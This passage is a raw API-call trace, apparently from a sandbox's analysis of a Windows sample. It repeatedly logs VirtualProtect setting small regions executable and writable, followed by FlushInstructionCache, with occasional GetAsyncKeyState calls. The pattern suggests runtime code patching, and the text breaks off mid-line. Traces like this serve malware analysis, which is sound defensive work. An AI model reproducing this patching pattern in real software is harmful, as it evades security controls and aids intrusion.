[0114.339] VirtualProtect (in: lpAddress=0xc9121b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.339] GetCurrentProcess () returned 0xffffffff [0114.340] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b5, dwSize=0x2) returned 1 [0114.340] GetCurrentProcess () returned 0xffffffff [0114.340] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d4, dwSize=0x14) returned 1 [0114.340] VirtualProtect (in: lpAddress=0xc9121d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.340] GetCurrentProcess () returned 0xffffffff [0114.340] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d5, dwSize=0x2) returned 1 [0114.340] GetCurrentProcess () returned 0xffffffff [0114.340] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc898, dwSize=0x14) returned 1 [0114.340] VirtualProtect (in: lpAddress=0xcadc898, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.341] GetCurrentProcess () returned 0xffffffff [0114.341] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc899, dwSize=0x2) returned 1 [0114.341] GetCurrentProcess () returned 0xffffffff [0114.341] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b8, dwSize=0x14) returned 1 [0114.341] VirtualProtect (in: lpAddress=0xcadc8b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.342] GetCurrentProcess () returned 0xffffffff [0114.342] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b9, dwSize=0x2) returned 1 [0114.342] GetCurrentProcess () returned 0xffffffff [0114.342] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d8, dwSize=0x14) returned 1 [0114.342] VirtualProtect (in: lpAddress=0xcadc8d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.342] GetCurrentProcess () returned 0xffffffff [0114.342] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d9, dwSize=0x2) returned 1 [0114.342] GetCurrentProcess () returned 0xffffffff [0114.342] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f8, dwSize=0x14) returned 1 [0114.342] VirtualProtect (in: lpAddress=0xcadc8f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.343] GetCurrentProcess () returned 0xffffffff [0114.343] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f9, dwSize=0x2) returned 1 [0114.343] GetCurrentProcess () returned 0xffffffff [0114.343] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc918, dwSize=0x14) returned 1 [0114.343] VirtualProtect (in: lpAddress=0xcadc918, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.344] GetCurrentProcess () returned 0xffffffff [0114.344] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc919, dwSize=0x2) returned 1 [0114.344] GetCurrentProcess () returned 0xffffffff [0114.344] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc938, dwSize=0x14) returned 1 [0114.344] VirtualProtect (in: lpAddress=0xcadc938, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.344] GetCurrentProcess () returned 0xffffffff [0114.344] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc939, dwSize=0x2) returned 1 [0114.344] GetCurrentProcess () returned 0xffffffff [0114.345] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc958, dwSize=0x14) returned 1 [0114.345] VirtualProtect (in: lpAddress=0xcadc958, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.345] GetCurrentProcess () returned 0xffffffff [0114.345] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc959, dwSize=0x2) returned 1 [0114.345] GetCurrentProcess () returned 0xffffffff [0114.345] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc978, dwSize=0x14) returned 1 [0114.345] VirtualProtect (in: lpAddress=0xcadc978, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.346] GetCurrentProcess () returned 0xffffffff [0114.346] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc979, dwSize=0x2) returned 1 [0114.346] GetCurrentProcess () returned 0xffffffff [0114.346] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc998, dwSize=0x14) returned 1 [0114.346] VirtualProtect (in: lpAddress=0xcadc998, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.347] GetCurrentProcess () returned 0xffffffff [0114.347] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc999, dwSize=0x2) returned 1 [0114.347] GetCurrentProcess () returned 0xffffffff [0114.347] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b8, dwSize=0x14) returned 1 [0114.347] VirtualProtect (in: lpAddress=0xcadc9b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.348] GetCurrentProcess () returned 0xffffffff [0114.348] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b9, dwSize=0x2) returned 1 [0114.348] GetCurrentProcess () returned 0xffffffff [0114.348] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d8, dwSize=0x14) returned 1 [0114.348] VirtualProtect (in: lpAddress=0xcadc9d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.348] GetCurrentProcess () returned 0xffffffff [0114.349] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d9, dwSize=0x2) returned 1 [0114.349] GetCurrentProcess () returned 0xffffffff [0114.349] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f8, dwSize=0x14) returned 1 [0114.349] VirtualProtect (in: lpAddress=0xcadc9f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.349] GetCurrentProcess () returned 0xffffffff [0114.349] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f9, dwSize=0x2) returned 1 [0114.349] GetCurrentProcess () returned 0xffffffff [0114.349] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca18, dwSize=0x14) returned 1 [0114.349] VirtualProtect (in: lpAddress=0xcadca18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.350] GetCurrentProcess () returned 0xffffffff [0114.350] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca19, dwSize=0x2) returned 1 [0114.350] GetCurrentProcess () returned 0xffffffff [0114.350] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca38, dwSize=0x14) returned 1 [0114.350] VirtualProtect (in: lpAddress=0xcadca38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.351] GetCurrentProcess () returned 0xffffffff [0114.351] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca39, dwSize=0x2) returned 1 [0114.351] GetCurrentProcess () returned 0xffffffff [0114.351] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca58, dwSize=0x14) returned 1 [0114.351] VirtualProtect (in: lpAddress=0xcadca58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.351] GetCurrentProcess () returned 0xffffffff [0114.351] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca59, dwSize=0x2) returned 1 [0114.351] GetCurrentProcess () returned 0xffffffff [0114.351] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca78, dwSize=0x14) returned 1 [0114.351] VirtualProtect (in: lpAddress=0xcadca78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.352] GetCurrentProcess () returned 0xffffffff [0114.352] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca79, dwSize=0x2) returned 1 [0114.352] GetCurrentProcess () returned 0xffffffff [0114.352] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e0, dwSize=0x14) returned 1 [0114.352] VirtualProtect (in: lpAddress=0xcadb0e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.353] GetCurrentProcess () returned 0xffffffff [0114.353] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e1, dwSize=0x2) returned 1 [0114.353] GetCurrentProcess () returned 0xffffffff [0114.353] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb100, dwSize=0x14) returned 1 [0114.353] VirtualProtect (in: lpAddress=0xcadb100, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.353] GetCurrentProcess () returned 0xffffffff [0114.353] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb101, dwSize=0x2) returned 1 [0114.353] GetCurrentProcess () returned 0xffffffff [0114.353] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb120, dwSize=0x14) returned 1 [0114.353] VirtualProtect (in: lpAddress=0xcadb120, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.354] GetCurrentProcess () returned 0xffffffff [0114.354] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb121, dwSize=0x2) returned 1 [0114.355] GetAsyncKeyState (vKey=3) returned 0 [0114.355] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.355] CRetailMalloc_Alloc () returned 0xcb0f9d8 [0114.355] memcpy (in: _Dst=0xb754f48, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.355] memcpy (in: _Dst=0xcb0f9f8, _Src=0x197724, _Size=0x18 | out: _Dst=0xcb0f9f8) returned 0xcb0f9f8 [0114.355] CRetailMalloc_Realloc () returned 0xcb0f9d8 [0114.355] CRetailMalloc_Free () returned 0x1 [0114.355] GetCurrentProcess () returned 0xffffffff [0114.355] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912074, dwSize=0x14) returned 1 [0114.355] VirtualProtect (in: lpAddress=0xc912074, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.356] GetCurrentProcess () returned 0xffffffff [0114.356] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912075, dwSize=0x2) returned 1 [0114.356] GetCurrentProcess () returned 0xffffffff [0114.356] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912094, dwSize=0x14) returned 1 [0114.356] VirtualProtect (in: lpAddress=0xc912094, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.357] GetCurrentProcess () returned 0xffffffff [0114.357] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912095, dwSize=0x2) returned 1 [0114.357] GetCurrentProcess () returned 0xffffffff [0114.357] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b4, dwSize=0x14) returned 1 [0114.357] VirtualProtect (in: lpAddress=0xc9120b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.357] GetCurrentProcess () returned 0xffffffff [0114.357] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b5, dwSize=0x2) returned 1 [0114.357] GetCurrentProcess () returned 0xffffffff [0114.357] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d4, dwSize=0x14) returned 1 [0114.357] VirtualProtect (in: lpAddress=0xc9120d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.358] GetCurrentProcess () returned 0xffffffff [0114.358] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d5, dwSize=0x2) returned 1 [0114.358] GetCurrentProcess () returned 0xffffffff [0114.358] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f4, dwSize=0x14) returned 1 [0114.358] VirtualProtect (in: lpAddress=0xc9120f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.359] GetCurrentProcess () returned 0xffffffff [0114.359] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f5, dwSize=0x2) returned 1 [0114.359] GetCurrentProcess () returned 0xffffffff [0114.359] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912114, dwSize=0x14) returned 1 [0114.359] VirtualProtect (in: lpAddress=0xc912114, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.359] GetCurrentProcess () returned 0xffffffff [0114.359] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912115, dwSize=0x2) returned 1 [0114.359] GetCurrentProcess () returned 0xffffffff [0114.359] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912134, dwSize=0x14) returned 1 [0114.360] VirtualProtect (in: lpAddress=0xc912134, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.360] GetCurrentProcess () returned 0xffffffff [0114.360] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912135, dwSize=0x2) returned 1 [0114.360] GetCurrentProcess () returned 0xffffffff [0114.360] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912154, dwSize=0x14) returned 1 [0114.360] VirtualProtect (in: lpAddress=0xc912154, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.361] GetCurrentProcess () returned 0xffffffff [0114.361] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912155, dwSize=0x2) returned 1 [0114.361] GetCurrentProcess () returned 0xffffffff [0114.361] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912174, dwSize=0x14) returned 1 [0114.361] VirtualProtect (in: lpAddress=0xc912174, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.361] GetCurrentProcess () returned 0xffffffff [0114.361] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912175, dwSize=0x2) returned 1 [0114.361] GetCurrentProcess () returned 0xffffffff [0114.361] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912194, dwSize=0x14) returned 1 [0114.362] VirtualProtect (in: lpAddress=0xc912194, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.362] GetCurrentProcess () returned 0xffffffff [0114.363] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912195, dwSize=0x2) returned 1 [0114.363] GetCurrentProcess () returned 0xffffffff [0114.363] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b4, dwSize=0x14) returned 1 [0114.363] VirtualProtect (in: lpAddress=0xc9121b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.363] GetCurrentProcess () returned 0xffffffff [0114.363] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b5, dwSize=0x2) returned 1 [0114.363] GetCurrentProcess () returned 0xffffffff [0114.363] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d4, dwSize=0x14) returned 1 [0114.363] VirtualProtect (in: lpAddress=0xc9121d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.364] GetCurrentProcess () returned 0xffffffff [0114.364] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d5, dwSize=0x2) returned 1 [0114.364] GetCurrentProcess () returned 0xffffffff [0114.364] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc898, dwSize=0x14) returned 1 [0114.364] VirtualProtect (in: lpAddress=0xcadc898, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.365] GetCurrentProcess () returned 0xffffffff [0114.365] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc899, dwSize=0x2) returned 1 [0114.365] GetCurrentProcess () returned 0xffffffff [0114.365] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b8, dwSize=0x14) returned 1 [0114.365] VirtualProtect (in: lpAddress=0xcadc8b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.365] GetCurrentProcess () returned 0xffffffff [0114.365] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b9, dwSize=0x2) returned 1 [0114.365] GetCurrentProcess () returned 0xffffffff [0114.365] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d8, dwSize=0x14) returned 1 [0114.365] VirtualProtect (in: lpAddress=0xcadc8d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.366] GetCurrentProcess () returned 0xffffffff [0114.366] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d9, dwSize=0x2) returned 1 [0114.366] GetCurrentProcess () returned 0xffffffff [0114.366] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f8, dwSize=0x14) returned 1 [0114.366] VirtualProtect (in: lpAddress=0xcadc8f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.367] GetCurrentProcess () returned 0xffffffff [0114.367] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f9, dwSize=0x2) returned 1 [0114.367] GetCurrentProcess () returned 0xffffffff [0114.367] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc918, dwSize=0x14) returned 1 [0114.367] VirtualProtect (in: lpAddress=0xcadc918, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.367] GetCurrentProcess () returned 0xffffffff [0114.367] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc919, dwSize=0x2) returned 1 [0114.368] GetCurrentProcess () returned 0xffffffff [0114.368] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc938, dwSize=0x14) returned 1 [0114.368] VirtualProtect (in: lpAddress=0xcadc938, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.368] GetCurrentProcess () returned 0xffffffff [0114.368] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc939, dwSize=0x2) returned 1 [0114.368] GetCurrentProcess () returned 0xffffffff [0114.368] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc958, dwSize=0x14) returned 1 [0114.368] VirtualProtect (in: lpAddress=0xcadc958, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.369] GetCurrentProcess () returned 0xffffffff [0114.369] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc959, dwSize=0x2) returned 1 [0114.369] GetCurrentProcess () returned 0xffffffff [0114.369] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc978, dwSize=0x14) returned 1 [0114.369] VirtualProtect (in: lpAddress=0xcadc978, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.369] GetCurrentProcess () returned 0xffffffff [0114.369] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc979, dwSize=0x2) returned 1 [0114.370] GetCurrentProcess () returned 0xffffffff [0114.370] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc998, dwSize=0x14) returned 1 [0114.370] VirtualProtect (in: lpAddress=0xcadc998, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.370] GetCurrentProcess () returned 0xffffffff [0114.370] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc999, dwSize=0x2) returned 1 [0114.370] GetCurrentProcess () returned 0xffffffff [0114.370] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b8, dwSize=0x14) returned 1 [0114.370] VirtualProtect (in: lpAddress=0xcadc9b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.371] GetCurrentProcess () returned 0xffffffff [0114.371] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b9, dwSize=0x2) returned 1 [0114.371] GetCurrentProcess () returned 0xffffffff [0114.371] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d8, dwSize=0x14) returned 1 [0114.371] VirtualProtect (in: lpAddress=0xcadc9d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.372] GetCurrentProcess () returned 0xffffffff [0114.372] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d9, dwSize=0x2) returned 1 [0114.372] GetCurrentProcess () returned 0xffffffff [0114.372] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f8, dwSize=0x14) returned 1 [0114.372] VirtualProtect (in: lpAddress=0xcadc9f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.372] GetCurrentProcess () returned 0xffffffff [0114.372] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f9, dwSize=0x2) returned 1 [0114.372] GetCurrentProcess () returned 0xffffffff [0114.372] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca18, dwSize=0x14) returned 1 [0114.372] VirtualProtect (in: lpAddress=0xcadca18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.373] GetCurrentProcess () returned 0xffffffff [0114.373] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca19, dwSize=0x2) returned 1 [0114.373] GetCurrentProcess () returned 0xffffffff [0114.373] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca38, dwSize=0x14) returned 1 [0114.373] VirtualProtect (in: lpAddress=0xcadca38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.374] GetCurrentProcess () returned 0xffffffff [0114.374] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca39, dwSize=0x2) returned 1 [0114.374] GetCurrentProcess () returned 0xffffffff [0114.374] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca58, dwSize=0x14) returned 1 [0114.374] VirtualProtect (in: lpAddress=0xcadca58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.375] GetCurrentProcess () returned 0xffffffff [0114.375] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca59, dwSize=0x2) returned 1 [0114.375] GetCurrentProcess () returned 0xffffffff [0114.375] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca78, dwSize=0x14) returned 1 [0114.375] VirtualProtect (in: lpAddress=0xcadca78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.375] GetCurrentProcess () returned 0xffffffff [0114.375] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca79, dwSize=0x2) returned 1 [0114.375] GetCurrentProcess () returned 0xffffffff [0114.375] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e0, dwSize=0x14) returned 1 [0114.375] VirtualProtect (in: lpAddress=0xcadb0e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.376] GetCurrentProcess () returned 0xffffffff [0114.376] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e1, dwSize=0x2) returned 1 [0114.376] GetCurrentProcess () returned 0xffffffff [0114.376] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb100, dwSize=0x14) returned 1 [0114.376] VirtualProtect (in: lpAddress=0xcadb100, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.377] GetCurrentProcess () returned 0xffffffff [0114.377] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb101, dwSize=0x2) returned 1 [0114.377] GetCurrentProcess () returned 0xffffffff [0114.377] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb120, dwSize=0x14) returned 1 [0114.377] VirtualProtect (in: lpAddress=0xcadb120, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.377] GetCurrentProcess () returned 0xffffffff [0114.377] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb121, dwSize=0x2) returned 1 [0114.382] GetAsyncKeyState (vKey=3) returned 0 [0114.382] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.383] CRetailMalloc_Alloc () returned 0xcb0fa38 [0114.383] memcpy (in: _Dst=0xb754f48, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.383] memcpy (in: _Dst=0xcb0fa58, _Src=0x197724, _Size=0x18 | out: _Dst=0xcb0fa58) returned 0xcb0fa58 [0114.383] CRetailMalloc_Realloc () returned 0xcb0fa38 [0114.383] CRetailMalloc_Free () returned 0x1 [0114.383] GetCurrentProcess () returned 0xffffffff [0114.383] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912074, dwSize=0x14) returned 1 [0114.383] VirtualProtect (in: lpAddress=0xc912074, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.384] GetCurrentProcess () returned 0xffffffff [0114.384] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912075, dwSize=0x2) returned 1 [0114.384] GetCurrentProcess () returned 0xffffffff [0114.384] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912094, dwSize=0x14) returned 1 [0114.384] VirtualProtect (in: lpAddress=0xc912094, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.384] GetCurrentProcess () returned 0xffffffff [0114.384] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912095, dwSize=0x2) returned 1 [0114.385] GetCurrentProcess () returned 0xffffffff [0114.385] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b4, dwSize=0x14) returned 1 [0114.385] VirtualProtect (in: lpAddress=0xc9120b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.385] GetCurrentProcess () returned 0xffffffff [0114.385] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b5, dwSize=0x2) returned 1 [0114.385] GetCurrentProcess () returned 0xffffffff [0114.385] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d4, dwSize=0x14) returned 1 [0114.386] VirtualProtect (in: 